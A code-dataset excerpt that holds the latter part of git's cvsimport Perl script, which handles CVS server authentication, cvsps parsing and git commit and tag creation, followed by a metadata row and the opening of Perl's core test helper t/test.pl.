[$ENV{'HOME'}."/.cvs/cvspass", qr/=/]);
my @loc = ();
foreach my $cvspass (@cvspass) {
my $p = find_password_entry($cvspass, $rr, $rr2);
if ($p) {
push @loc, $cvspass->[0];
$pass = $p;
}
}
if (1 < @loc) {
die("Multiple cvs password files have ".
"entries for CVSROOT $opt_d: @loc");
} elsif (!$pass) {
$pass = "A";
}
}
my ($s, $rep);
if ($proxyhost) {
# Use a HTTP Proxy. Only works for HTTP proxies that
# don't require user authentication
#
# See: http://www.ietf.org/rfc/rfc2817.txt
$s = IO::Socket::INET->new(PeerHost => $proxyhost, PeerPort => $proxyport);
die "Socket to $proxyhost: $!\n" unless defined $s;
$s->write("CONNECT $serv:$port HTTP/1.1\r\nHost: $serv:$port\r\n\r\n")
or die "Write to $proxyhost: $!\n";
$s->flush();
$rep = <$s>;
# The answer should look like 'HTTP/1.x 2yy ....'
if (!($rep =~ m#^HTTP/1\.. 2[0-9][0-9]#)) {
die "Proxy connect: $rep\n";
}
# Skip up to the empty line of the proxy server output
# including the response headers.
while ($rep = <$s>) {
last if (!defined $rep ||
$rep eq "\n" ||
$rep eq "\r\n");
}
} else {
$s = IO::Socket::INET->new(PeerHost => $serv, PeerPort => $port);
die "Socket to $serv: $!\n" unless defined $s;
}
$s->write("BEGIN AUTH REQUEST\n$repo\n$user\n$pass\nEND AUTH REQUEST\n")
or die "Write to $serv: $!\n";
$s->flush();
$rep = <$s>;
if ($rep ne "I LOVE YOU\n") {
$rep="<unknown>" unless $rep;
die "AuthReply: $rep\n";
}
$self->{'socketo'} = $s;
$self->{'socketi'} = $s;
} else { # local or ext: Fork off our own cvs server.
my $pr = IO::Pipe->new();
my $pw = IO::Pipe->new();
my $pid = fork();
die "Fork: $!\n" unless defined $pid;
my $cvs = 'cvs';
$cvs = $ENV{CVS_SERVER} if exists $ENV{CVS_SERVER};
my $rsh = 'rsh';
$rsh = $ENV{CVS_RSH} if exists $ENV{CVS_RSH};
my @cvs = ($cvs, 'server');
my ($local, $user, $host);
$local = $repo =~ s/:local://;
if (!$local) {
$repo =~ s/:ext://;
$local = !($repo =~ s/^(?:([^\@:]+)\@)?([^:]+)://);
($user, $host) = ($1, $2);
}
if (!$local) {
if ($user) {
unshift @cvs, $rsh, '-l', $user, $host;
} else {
unshift @cvs, $rsh, $host;
}
}
unless ($pid) {
$pr->writer();
$pw->reader();
dup2($pw->fileno(),0);
dup2($pr->fileno(),1);
$pr->close();
$pw->close();
exec(@cvs);
}
$pw->writer();
$pr->reader();
$self->{'socketo'} = $pw;
$self->{'socketi'} = $pr;
}
$self->{'socketo'}->write("Root $repo\n");
# Trial and error says that this probably is the minimum set
$self->{'socketo'}->write("Valid-responses ok error Valid-requests Mode M Mbinary E Checked-in Created Updated Merged Removed\n");
$self->{'socketo'}->write("valid-requests\n");
$self->{'socketo'}->flush();
my $rep=$self->readline();
die "Failed to read from server" unless defined $rep;
chomp($rep);
if ($rep !~ s/^Valid-requests\s*//) {
$rep="<unknown>" unless $rep;
die "Expected Valid-requests from server, but got: $rep\n";
}
chomp(my $res=$self->readline());
die "validReply: $res\n" if $res ne "ok";
$self->{'socketo'}->write("UseUnchanged\n") if $rep =~ /\bUseUnchanged\b/;
$self->{'repo'} = $repo;
}
sub readline {
my ($self) = @_;
return $self->{'socketi'}->getline();
}
sub _file {
# Request a file with a given revision.
# Trial and error says this is a good way to do it. :-/
my ($self,$fn,$rev) = @_;
$self->{'socketo'}->write("Argument -N\n") or return undef;
$self->{'socketo'}->write("Argument -P\n") or return undef;
# -kk: Linus' version doesn't use it - defaults to off
if ($opt_k) {
$self->{'socketo'}->write("Argument -kk\n") or return undef;
}
$self->{'socketo'}->write("Argument -r\n") or return undef;
$self->{'socketo'}->write("Argument $rev\n") or return undef;
$self->{'socketo'}->write("Argument --\n") or return undef;
$self->{'socketo'}->write("Argument $self->{'subdir'}/$fn\n") or return undef;
$self->{'socketo'}->write("Directory .\n") or return undef;
$self->{'socketo'}->write("$self->{'repo'}\n") or return undef;
# $self->{'socketo'}->write("Sticky T1.0\n") or return undef;
$self->{'socketo'}->write("co\n") or return undef;
$self->{'socketo'}->flush() or return undef;
$self->{'lines'} = 0;
return 1;
}
sub _line {
# Read a line from the server.
# ... except that 'line' may be an entire file. ;-)
my ($self, $fh) = @_;
die "Not in lines" unless defined $self->{'lines'};
my $line;
my $res=0;
while (defined($line = $self->readline())) {
# M U gnupg-cvs-rep/AUTHORS
# Updated gnupg-cvs-rep/
# /daten/src/rsync/gnupg-cvs-rep/AUTHORS
# /AUTHORS/1.1///T1.1
# u=rw,g=rw,o=rw
# 0
# ok
if ($line =~ s/^(?:Created|Updated) //) {
$line = $self->readline(); # path
$line = $self->readline(); # Entries line
my $mode = $self->readline(); chomp $mode;
$self->{'mode'} = $mode;
defined (my $cnt = $self->readline())
or die "EOF from server after 'Changed'\n";
chomp $cnt;
die "Duh: Filesize $cnt" if $cnt !~ /^\d+$/;
$line="";
$res = $self->_fetchfile($fh, $cnt);
} elsif ($line =~ s/^ //) {
print $fh $line;
$res += length($line);
} elsif ($line =~ /^M\b/) {
# output, do nothing
} elsif ($line =~ /^Mbinary\b/) {
my $cnt;
die "EOF from server after 'Mbinary'" unless defined ($cnt = $self->readline());
chomp $cnt;
die "Duh: Mbinary $cnt" if $cnt !~ /^\d+$/ or $cnt<1;
$line="";
$res += $self->_fetchfile($fh, $cnt);
} else {
chomp $line;
if ($line eq "ok") {
# print STDERR "S: ok (".length($res).")\n";
return $res;
} elsif ($line =~ s/^E //) {
# print STDERR "S: $line\n";
} elsif ($line =~ /^(Remove-entry|Removed) /i) {
$line = $self->readline(); # filename
$line = $self->readline(); # OK
chomp $line;
die "Unknown: $line" if $line ne "ok";
return -1;
} else {
die "Unknown: $line\n";
}
}
}
return undef;
}
sub file {
my ($self,$fn,$rev) = @_;
my $res;
my ($fh, $name) = tempfile('gitcvs.XXXXXX',
DIR => File::Spec->tmpdir(), UNLINK => 1);
$self->_file($fn,$rev) and $res = $self->_line($fh);
if (!defined $res) {
print STDERR "Server has gone away while fetching $fn $rev, retrying...\n";
truncate $fh, 0;
$self->conn();
$self->_file($fn,$rev) or die "No file command send";
$res = $self->_line($fh);
die "Retry failed" unless defined $res;
}
close ($fh);
return ($name, $res);
}
sub _fetchfile {
my ($self, $fh, $cnt) = @_;
my $res = 0;
my $bufsize = 1024 * 1024;
while ($cnt) {
if ($bufsize > $cnt) {
$bufsize = $cnt;
}
my $buf;
my $num = $self->{'socketi'}->read($buf,$bufsize);
die "Server: Filesize $cnt: $num: $!\n" if not defined $num or $num<=0;
print $fh $buf;
$res += $num;
$cnt -= $num;
}
return $res;
}
sub _scramble {
my ($self, $pass) = @_;
my $scrambled = "A";
return $scrambled unless $pass;
my $pass_len = length($pass);
my @pass_arr = split("", $pass);
my $i;
# from cvs/src/scramble.c
my @shifts = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,
111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,
41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,
125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,
36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,
225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,
199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,
174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,
207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,
192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,
227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,
182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,
243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152
);
for ($i = 0; $i < $pass_len; $i++) {
$scrambled .= pack("C", $shifts[ord($pass_arr[$i])]);
}
return $scrambled;
}
package main;
my $cvs = CVSconn->new($opt_d, $cvs_tree);
sub pdate($) {
my ($d) = @_;
m#(\d{2,4})/(\d\d)/(\d\d)\s(\d\d):(\d\d)(?::(\d\d))?#
or die "Unparseable date: $d\n";
my $y=$1; $y-=1900 if $y>1900;
return timegm($6||0,$5,$4,$3,$2-1,$y);
}
sub pmode($) {
my ($mode) = @_;
my $m = 0;
my $mm = 0;
my $um = 0;
for my $x(split(//,$mode)) {
if ($x eq ",") {
$m |= $mm&$um;
$mm = 0;
$um = 0;
} elsif ($x eq "u") { $um |= 0700;
} elsif ($x eq "g") { $um |= 0070;
} elsif ($x eq "o") { $um |= 0007;
} elsif ($x eq "r") { $mm |= 0444;
} elsif ($x eq "w") { $mm |= 0222;
} elsif ($x eq "x") { $mm |= 0111;
} elsif ($x eq "=") { # do nothing
} else { die "Unknown mode: $mode\n";
}
}
$m |= $mm&$um;
return $m;
}
sub getwd() {
my $pwd = `pwd`;
chomp $pwd;
return $pwd;
}
sub is_sha1 {
my $s = shift;
return $s =~ /^[a-f0-9]{40}$/;
}
sub get_headref ($) {
my $name = shift;
my $r = `git rev-parse --verify '$name' 2>/dev/null`;
return undef unless $? == 0;
chomp $r;
return $r;
}
my $user_filename_prepend = '';
sub munge_user_filename {
my $name = shift;
return File::Spec->file_name_is_absolute($name) ?
$name :
$user_filename_prepend . $name;
}
-d $git_tree
or mkdir($git_tree,0777)
or die "Could not create $git_tree: $!";
if ($git_tree ne '.') {
$user_filename_prepend = getwd() . '/';
chdir($git_tree);
}
my $last_branch = "";
my $orig_branch = "";
my %branch_date;
my $tip_at_start = undef;
my $git_dir = $ENV{"GIT_DIR"} || ".git";
$git_dir = getwd()."/".$git_dir unless $git_dir =~ m#^/#;
$ENV{"GIT_DIR"} = $git_dir;
my $orig_git_index;
$orig_git_index = $ENV{GIT_INDEX_FILE} if exists $ENV{GIT_INDEX_FILE};
my %index; # holds filenames of one index per branch
unless (-d $git_dir) {
system(qw(git init));
die "Cannot init the GIT db at $git_tree: $?\n" if $?;
system(qw(git read-tree --empty));
die "Cannot init an empty tree: $?\n" if $?;
$last_branch = $opt_o;
$orig_branch = "";
} else {
open(F, "-|", qw(git symbolic-ref HEAD)) or
die "Cannot run git symbolic-ref: $!\n";
chomp ($last_branch = <F>);
$last_branch = basename($last_branch);
close(F);
unless ($last_branch) {
warn "Cannot read the last branch name: $! -- assuming 'master'\n";
$last_branch = "master";
}
$orig_branch = $last_branch;
$tip_at_start = `git rev-parse --verify HEAD`;
# Get the last import timestamps
my $fmt = '($ref, $author) = (%(refname), %(author));';
my @cmd = ('git', 'for-each-ref', '--perl', "--format=$fmt", $remote);
open(H, "-|", @cmd) or die "Cannot run git for-each-ref: $!\n";
while (defined(my $entry = <H>)) {
my ($ref, $author);
eval($entry) || die "cannot eval refs list: $@";
my ($head) = ($ref =~ m|^$remote/(.*)|);
$author =~ /^.*\s(\d+)\s[-+]\d{4}$/;
$branch_date{$head} = $1;
}
close(H);
if (!exists $branch_date{$opt_o}) {
die "Branch '$opt_o' does not exist.\n".
"Either use the correct '-o branch' option,\n".
"or import to a new repository.\n";
}
}
-d $git_dir
or die "Could not create git subdir ($git_dir).\n";
# now we read (and possibly save) author-info as well
-f "$git_dir/cvs-authors" and
read_author_info("$git_dir/cvs-authors");
if ($opt_A) {
read_author_info(munge_user_filename($opt_A));
write_author_info("$git_dir/cvs-authors");
}
# open .git/cvs-revisions, if requested
open my $revision_map, '>>', "$git_dir/cvs-revisions"
or die "Can't open $git_dir/cvs-revisions for appending: $!\n"
if defined $opt_R;
#
# run cvsps into a file unless we are getting
# it passed as a file via $opt_P
#
my $cvspsfile;
unless ($opt_P) {
print "Running cvsps...\n" if $opt_v;
my $pid = open(CVSPS,"-|");
my $cvspsfh;
die "Cannot fork: $!\n" unless defined $pid;
unless ($pid) {
my @opt;
@opt = split(/,/,$opt_p) if defined $opt_p;
unshift @opt, '-z', $opt_z if defined $opt_z;
unshift @opt, '-q' unless defined $opt_v;
unless (defined($opt_p) && $opt_p =~ m/--no-cvs-direct/) {
push @opt, '--cvs-direct';
}
exec("cvsps","--norc",@opt,"-u","-A",'--root',$opt_d,$cvs_tree);
die "Could not start cvsps: $!\n";
}
($cvspsfh, $cvspsfile) = tempfile('gitXXXXXX', SUFFIX => '.cvsps',
DIR => File::Spec->tmpdir());
while (<CVSPS>) {
print $cvspsfh $_;
}
close CVSPS;
$? == 0 or die "git cvsimport: fatal: cvsps reported error\n";
close $cvspsfh;
} else {
$cvspsfile = munge_user_filename($opt_P);
}
open(CVS, "<$cvspsfile") or die $!;
## cvsps output:
#---------------------
#PatchSet 314
#Date: 1999/09/18 13:03:59
#Author: wkoch
#Branch: STABLE-BRANCH-1-0
#Ancestor branch: HEAD
#Tag: (none)
#Log:
# See ChangeLog: Sat Sep 18 13:03:28 CEST 1999 Werner Koch
#Members:
# README:1.57->1.57.2.1
# VERSION:1.96->1.96.2.1
#
#---------------------
my $state = 0;
sub update_index (\@\@) {
my $old = shift;
my $new = shift;
open(my $fh, '|-', qw(git update-index -z --index-info))
or die "unable to open git update-index: $!";
print $fh
(map { "0 0000000000000000000000000000000000000000\t$_\0" }
@$old),
(map { '100' . sprintf('%o', $_->[0]) . " $_->[1]\t$_->[2]\0" }
@$new)
or die "unable to write to git update-index: $!";
close $fh
or die "unable to write to git update-index: $!";
$? and die "git update-index reported error: $?";
}
sub write_tree () {
open(my $fh, '-|', qw(git write-tree))
or die "unable to open git write-tree: $!";
chomp(my $tree = <$fh>);
is_sha1($tree)
or die "Cannot get tree id ($tree): $!";
close($fh)
or die "Error running git write-tree: $?\n";
print "Tree ID $tree\n" if $opt_v;
return $tree;
}
my ($patchset,$date,$author_name,$author_email,$author_tz,$branch,$ancestor,$tag,$logmsg);
my (@old,@new,@skipped,%ignorebranch,@commit_revisions);
# commits that cvsps cannot place anywhere...
$ignorebranch{'#CVSPS_NO_BRANCH'} = 1;
sub commit {
if ($branch eq $opt_o && !$index{branch} &&
!get_headref("$remote/$branch")) {
# looks like an initial commit
# use the index primed by git init
$ENV{GIT_INDEX_FILE} = "$git_dir/index";
$index{$branch} = "$git_dir/index";
} else {
# use an index per branch to speed up
# imports of projects with many branches
unless ($index{$branch}) {
$index{$branch} = tmpnam();
$ENV{GIT_INDEX_FILE} = $index{$branch};
if ($ancestor) {
system("git", "read-tree", "$remote/$ancestor");
} else {
system("git", "read-tree", "$remote/$branch");
}
die "read-tree failed: $?\n" if $?;
}
}
$ENV{GIT_INDEX_FILE} = $index{$branch};
update_index(@old, @new);
@old = @new = ();
my $tree = write_tree();
my $parent = get_headref("$remote/$last_branch");
print "Parent ID " . ($parent ? $parent : "(empty)") . "\n" if $opt_v;
my @commit_args;
push @commit_args, ("-p", $parent) if $parent;
# loose detection of merges
# based on the commit msg
foreach my $rx (@mergerx) {
next unless $logmsg =~ $rx && $1;
my $mparent = $1 eq 'HEAD' ? $opt_o : $1;
if (my $sha1 = get_headref("$remote/$mparent")) {
push @commit_args, '-p', "$remote/$mparent";
print "Merge parent branch: $mparent\n" if $opt_v;
}
}
set_timezone($author_tz);
# $date is in the seconds since epoch format
my $tz_offset = get_tz_offset($date);
my $commit_date = "$date $tz_offset";
set_timezone('UTC');
$ENV{GIT_AUTHOR_NAME} = $author_name;
$ENV{GIT_AUTHOR_EMAIL} = $author_email;
$ENV{GIT_AUTHOR_DATE} = $commit_date;
$ENV{GIT_COMMITTER_NAME} = $author_name;
$ENV{GIT_COMMITTER_EMAIL} = $author_email;
$ENV{GIT_COMMITTER_DATE} = $commit_date;
my $pid = open2(my $commit_read, my $commit_write,
'git', 'commit-tree', $tree, @commit_args);
# compatibility with git2cvs
substr($logmsg,32767) = "" if length($logmsg) > 32767;
$logmsg =~ s/[\s\n]+\z//;
if (@skipped) {
$logmsg .= "\n\n\nSKIPPED:\n\t";
$logmsg .= join("\n\t", @skipped) . "\n";
@skipped = ();
}
print($commit_write "$logmsg\n") && close($commit_write)
or die "Error writing to git commit-tree: $!\n";
print "Committed patch $patchset ($branch $commit_date)\n" if $opt_v;
chomp(my $cid = <$commit_read>);
is_sha1($cid) or die "Cannot get commit id ($cid): $!\n";
print "Commit ID $cid\n" if $opt_v;
close($commit_read);
waitpid($pid,0);
die "Error running git commit-tree: $?\n" if $?;
system('git' , 'update-ref', "$remote/$branch", $cid) == 0
or die "Cannot write branch $branch for update: $!\n";
if ($revision_map) {
print $revision_map "@$_ $cid\n" for @commit_revisions;
}
@commit_revisions = ();
if ($tag) {
my ($xtag) = $tag;
$xtag =~ s/\s+\*\*.*$//; # Remove stuff like ** INVALID ** and ** FUNKY **
$xtag =~ tr/_/\./ if ( $opt_u );
$xtag =~ s/[\/]/$opt_s/g;
# See refs.c for these rules.
# Tag cannot contain bad chars. (See bad_ref_char in refs.c.)
$xtag =~ s/[ ~\^:\\\*\?\[]//g;
# Other bad strings for tags:
# (See check_refname_component in refs.c.)
1 while $xtag =~ s/
(?: \.\. # Tag cannot contain '..'.
| \@{ # Tag cannot contain '@{'.
| ^ - # Tag cannot begin with '-'.
| \.lock $ # Tag cannot end with '.lock'.
| ^ \. # Tag cannot begin...
| \. $ # ...or end with '.'
)//xg;
# Tag cannot be empty.
if ($xtag eq '') {
warn("warning: ignoring tag '$tag'",
" with invalid tagname\n");
return;
}
if (system('git' , 'tag', '-f', $xtag, $cid) != 0) {
# We did our best to sanitize the tag, but still failed
# for whatever reason. Bail out, and give the user
# enough information to understand if/how we should
# improve the translation in the future.
if ($tag ne $xtag) {
print "Translated '$tag' tag to '$xtag'\n";
}
die "Cannot create tag $xtag: $!\n";
}
print "Created tag '$xtag' on '$branch'\n" if $opt_v;
}
};
my $commitcount = 1;
while (<CVS>) {
chomp;
if ($state == 0 and /^-+$/) {
$state = 1;
} elsif ($state == 0) {
$state = 1;
redo;
} elsif (($state==0 or $state==1) and s/^PatchSet\s+//) {
$patchset = 0+$_;
$state=2;
} elsif ($state == 2 and s/^Date:\s+//) {
$date = pdate($_);
unless ($date) {
print STDERR "Could not parse date: $_\n";
$state=0;
next;
}
$state=3;
} elsif ($state == 3 and s/^Author:\s+//) {
$author_tz = "UTC";
s/\s+$//;
if (/^(.*?)\s+<(.*)>/) {
($author_name, $author_email) = ($1, $2);
} elsif ($conv_author_name{$_}) {
$author_name = $conv_author_name{$_};
$author_email = $conv_author_email{$_};
$author_tz = $conv_author_tz{$_} if ($conv_author_tz{$_});
} else {
$author_name = $author_email = $_;
}
$state = 4;
} elsif ($state == 4 and s/^Branch:\s+//) {
s/\s+$//;
tr/_/\./ if ( $opt_u );
s/[\/]/$opt_s/g;
$branch = $_;
$state = 5;
} elsif ($state == 5 and s/^Ancestor branch:\s+//) {
s/\s+$//;
$ancestor = $_;
$ancestor = $opt_o if $ancestor eq "HEAD";
$state = 6;
} elsif ($state == 5) {
$ancestor = undef;
$state = 6;
redo;
} elsif ($state == 6 and s/^Tag:\s+//) {
s/\s+$//;
if ($_ eq "(none)") {
$tag = undef;
} else {
$tag = $_;
}
$state = 7;
} elsif ($state == 7 and /^Log:/) {
$logmsg = "";
$state = 8;
} elsif ($state == 8 and /^Members:/) {
$branch = $opt_o if $branch eq "HEAD";
if (defined $branch_date{$branch} and $branch_date{$branch} >= $date) {
# skip
print "skip patchset $patchset: $date before $branch_date{$branch}\n" if $opt_v;
$state = 11;
next;
}
if (!$opt_a && $starttime - 300 - (defined $opt_z ? $opt_z : 300) <= $date) {
# skip if the commit is too recent
# given that the cvsps default fuzz is 300s, we give ourselves another
# 300s just in case -- this also prevents skipping commits
# due to server clock drift
print "skip patchset $patchset: $date too recent\n" if $opt_v;
$state = 11;
next;
}
if (exists $ignorebranch{$branch}) {
print STDERR "Skipping $branch\n";
$state = 11;
next;
}
if ($ancestor) {
if ($ancestor eq $branch) {
print STDERR "Branch $branch erroneously stems from itself -- changed ancestor to $opt_o\n";
$ancestor = $opt_o;
}
if (defined get_headref("$remote/$branch")) {
print STDERR "Branch $branch already exists!\n";
$state=11;
next;
}
my $id = get_headref("$remote/$ancestor");
if (!$id) {
print STDERR "Branch $ancestor does not exist!\n";
$ignorebranch{$branch} = 1;
$state=11;
next;
}
system(qw(git update-ref -m cvsimport),
"$remote/$branch", $id);
if($? != 0) {
print STDERR "Could not create branch $branch\n";
$ignorebranch{$branch} = 1;
$state=11;
next;
}
}
$last_branch = $branch if $branch ne $last_branch;
$state = 9;
} elsif ($state == 8) {
$logmsg .= "$_\n";
} elsif ($state == 9 and /^\s+(.+?):(INITIAL|\d+(?:\.\d+)+)->(\d+(?:\.\d+)+)\s*$/) {
# VERSION:1.96->1.96.2.1
my $init = ($2 eq "INITIAL");
my $fn = $1;
my $rev = $3;
$fn =~ s#^/+##;
if ($opt_S && $fn =~ m/$opt_S/) {
print "SKIPPING $fn v $rev\n";
push(@skipped, $fn);
next;
}
push @commit_revisions, [$fn, $rev];
print "Fetching $fn v $rev\n" if $opt_v;
my ($tmpname, $size) = $cvs->file($fn,$rev);
if ($size == -1) {
push(@old,$fn);
print "Drop $fn\n" if $opt_v;
} else {
print "".($init ? "New" : "Update")." $fn: $size bytes\n" if $opt_v;
my $pid = open(my $F, '-|');
die $! unless defined $pid;
if (!$pid) {
exec("git", "hash-object", "-w", $tmpname)
or die "Cannot create object: $!\n";
}
my $sha = <$F>;
chomp $sha;
close $F;
my $mode = pmode($cvs->{'mode'});
push(@new,[$mode, $sha, $fn]); # may be resurrected!
}
unlink($tmpname);
} elsif ($state == 9 and /^\s+(.+?):\d+(?:\.\d+)+->(\d+(?:\.\d+)+)\(DEAD\)\s*$/) {
my $fn = $1;
my $rev = $2;
$fn =~ s#^/+##;
push @commit_revisions, [$fn, $rev];
push(@old,$fn);
print "Delete $fn\n" if $opt_v;
} elsif ($state == 9 and /^\s*$/) {
$state = 10;
} elsif (($state == 9 or $state == 10) and /^-+$/) {
$commitcount++;
if ($opt_L && $commitcount > $opt_L) {
last;
}
commit();
if (($commitcount & 1023) == 0) {
system(qw(git repack -a -d));
}
$state = 1;
} elsif ($state == 11 and /^-+$/) {
$state = 1;
} elsif (/^-+$/) { # end of unknown-line processing
$state = 1;
} elsif ($state != 11) { # ignore stuff when skipping
print STDERR "* UNKNOWN LINE * $_\n";
}
}
commit() if $branch and $state != 11;
unless ($opt_P) {
unlink($cvspsfile);
}
# The heuristic of repacking every 1024 commits can leave a
# lot of unpacked data. If there is more than 1MB worth of
# not-packed objects, repack once more.
my $line = `git count-objects`;
if ($line =~ /^(\d+) objects, (\d+) kilobytes$/) {
my ($n_objects, $kb) = ($1, $2);
1024 < $kb
and system(qw(git repack -a -d));
}
foreach my $git_index (values %index) {
if ($git_index ne "$git_dir/index") {
unlink($git_index);
}
}
if (defined $orig_git_index) {
$ENV{GIT_INDEX_FILE} = $orig_git_index;
} else {
delete $ENV{GIT_INDEX_FILE};
}
# Now switch back to the branch we were in before all of this happened
if ($orig_branch) {
print "DONE.\n" if $opt_v;
if ($opt_i) {
exit 0;
}
my $tip_at_end = `git rev-parse --verify HEAD`;
if ($tip_at_start ne $tip_at_end) {
for ($tip_at_start, $tip_at_end) { chomp; }
print "Fetched into the current branch.\n" if $opt_v;
system(qw(git read-tree -u -m),
$tip_at_start, $tip_at_end);
die "Fast-forward update failed: $?\n" if $?;
}
else {
system(qw(git merge cvsimport HEAD), "$remote/$opt_o");
die "Could not merge $opt_o into the current branch.\n" if $?;
}
} else {
$orig_branch = "master";
print "DONE; creating $orig_branch branch\n" if $opt_v;
system("git", "update-ref", "refs/heads/master", "$remote/$opt_o")
unless defined get_headref('refs/heads/master');
system("git", "symbolic-ref", "$remote/HEAD", "$remote/$opt_o")
if ($opt_r && $opt_o ne 'HEAD');
system('git', 'update-ref', 'HEAD', "$orig_branch");
unless ($opt_i) {
system(qw(git checkout -f));
die "checkout failed: $?\n" if $?;
}
}
| 27.11177 | 150 | 0.571379 |
edb5d0e1be1975272cba2935bc9c4fe26a3078e6 | 49,680 | pl | Perl | v5.24/t/test.pl | perl11/p5-coretests | 65f340f49aea59bd666f1bf5c077a66004b51731 | [
"Artistic-2.0"
] | 1 | 2015-12-07T12:45:44.000Z | 2015-12-07T12:45:44.000Z | v5.24/t/test.pl | perl11/p5-coretests | 65f340f49aea59bd666f1bf5c077a66004b51731 | [
"Artistic-2.0"
] | null | null | null | v5.24/t/test.pl | perl11/p5-coretests | 65f340f49aea59bd666f1bf5c077a66004b51731 | [
"Artistic-2.0"
] | null | null | null | #
# t/test.pl - most of Test::More functionality without the fuss
# NOTE:
#
# It's best to not features found only in more modern Perls here, as some cpan
# distributions copy this file and operate on older Perls. Similarly keep
# things simple as this may be run under fairly broken circumstances. For
# example, increment ($x++) has a certain amount of cleverness for things like
#
# $x = 'zz';
# $x++; # $x eq 'aaa';
#
# This stands more chance of breaking than just a simple
#
# $x = $x + 1
#
# In this file, we use the latter "Baby Perl" approach, and increment
# will be worked over by t/op/inc.t
$Level = 1;
my $test = 1;
my $planned;
my $noplan;
my $Perl; # Safer version of $^X set by which_perl()
# This defines ASCII/UTF-8 vs EBCDIC/UTF-EBCDIC
$::IS_ASCII = ord 'A' == 65;
$::IS_EBCDIC = ord 'A' == 193;
$TODO = 0;
$NO_ENDING = 0;
$Tests_Are_Passing = 1;
# Use this instead of print to avoid interference while testing globals.
sub _print {
local($\, $", $,) = (undef, ' ', '');
print STDOUT @_;
}
sub _print_stderr {
local($\, $", $,) = (undef, ' ', '');
print STDERR @_;
}
sub plan {
my $n;
if (@_ == 1) {
$n = shift;
if ($n eq 'no_plan') {
undef $n;
$noplan = 1;
}
} else {
my %plan = @_;
$plan{skip_all} and skip_all($plan{skip_all});
$n = $plan{tests};
}
_print "1..$n\n" unless $noplan;
$planned = $n;
}
# Set the plan at the end. See Test::More::done_testing.
sub done_testing {
my $n = $test - 1;
$n = shift if @_;
_print "1..$n\n";
$planned = $n;
}
END {
my $ran = $test - 1;
if (!$NO_ENDING) {
if (defined $planned && $planned != $ran) {
_print_stderr
"# Looks like you planned $planned tests but ran $ran.\n";
} elsif ($noplan) {
_print "1..$ran\n";
}
}
}
sub _diag {
return unless @_;
my @mess = _comment(@_);
$TODO ? _print(@mess) : _print_stderr(@mess);
}
# Use this instead of "print STDERR" when outputting failure diagnostic
# messages
sub diag {
_diag(@_);
}
# Use this instead of "print" when outputting informational messages
sub note {
return unless @_;
_print( _comment(@_) );
}
sub is_miniperl {
return !defined &DynaLoader::boot_DynaLoader;
}
sub is_cperl {
return $^V =~ /c$/;
}
sub set_up_inc {
# Don’t clobber @INC under miniperl
#unshift @INC, () unless is_miniperl;
unshift @INC, @_;
}
sub _comment {
return map { /^#/ ? "$_\n" : "# $_\n" }
map { split /\n/ } @_;
}
sub _have_dynamic_extension {
my $extension = shift;
unless (eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
return 1;
}
$extension =~ s!::!/!g;
return 1 if ($Config::Config{extensions} =~ /\b$extension\b/);
}
sub skip_all {
if (@_) {
_print "1..0 # Skip @_\n";
} else {
_print "1..0\n";
}
exit(0);
}
sub skip_all_if_miniperl {
skip_all(@_) if is_miniperl();
}
sub skip_all_without_dynamic_extension {
my ($extension) = @_;
skip_all("no dynamic loading on miniperl, no $extension") if is_miniperl();
return if &_have_dynamic_extension;
skip_all("$extension was not built");
}
sub skip_all_without_perlio {
skip_all('no PerlIO') unless PerlIO::Layer->find('perlio');
}
sub skip_all_without_config {
unless (eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
return;
}
foreach (@_) {
next if $Config::Config{$_};
my $key = $_; # Need to copy, before trying to modify.
$key =~ s/^use//;
$key =~ s/^d_//;
skip_all("no $key");
}
}
sub skip_all_without_unicode_tables { # (but only under miniperl)
if (is_miniperl()) {
skip_all_if_miniperl("Unicode tables not built yet")
unless eval 'require "unicore/Heavy.pl"';
}
}
sub find_git_or_skip {
my ($source_dir, $reason);
if (-d '.git') {
$source_dir = '.';
} elsif (-l 'MANIFEST' && -l 'AUTHORS') {
my $where = readlink 'MANIFEST';
die "Can't readling MANIFEST: $!" unless defined $where;
die "Confusing symlink target for MANIFEST, '$where'"
unless $where =~ s!/MANIFEST\z!!;
if (-d "$where/.git") {
# Looks like we are in a symlink tree
if (exists $ENV{GIT_DIR}) {
diag("Found source tree at $where, but \$ENV{GIT_DIR} is $ENV{GIT_DIR}. Not changing it");
} else {
note("Found source tree at $where, setting \$ENV{GIT_DIR}");
$ENV{GIT_DIR} = "$where/.git";
}
$source_dir = $where;
}
} elsif (exists $ENV{GIT_DIR}) {
my $commit = '8d063cd8450e59ea1c611a2f4f5a21059a2804f1';
my $out = `git rev-parse --verify --quiet '$commit^{commit}'`;
chomp $out;
if($out eq $commit) {
$source_dir = '.'
}
}
if ($source_dir) {
my $version_string = `git --version`;
if (defined $version_string
&& $version_string =~ /\Agit version (\d+\.\d+\.\d+)(.*)/) {
return $source_dir if eval "v$1 ge v1.5.0";
# If you have earlier than 1.5.0 and it works, change this test
$reason = "in git checkout, but git version '$1$2' too old";
} else {
$reason = "in git checkout, but cannot run git";
}
} else {
$reason = 'not being run from a git checkout';
}
skip_all($reason) if $_[0] && $_[0] eq 'all';
skip($reason, @_);
}
sub BAIL_OUT {
my ($reason) = @_;
_print("Bail out! $reason\n");
exit 255;
}
sub _ok {
my ($pass, $where, $name, @mess) = @_;
# Do not try to microoptimize by factoring out the "not ".
# VMS will avenge.
my $out;
if ($name) {
# escape out '#' or it will interfere with '# skip' and such
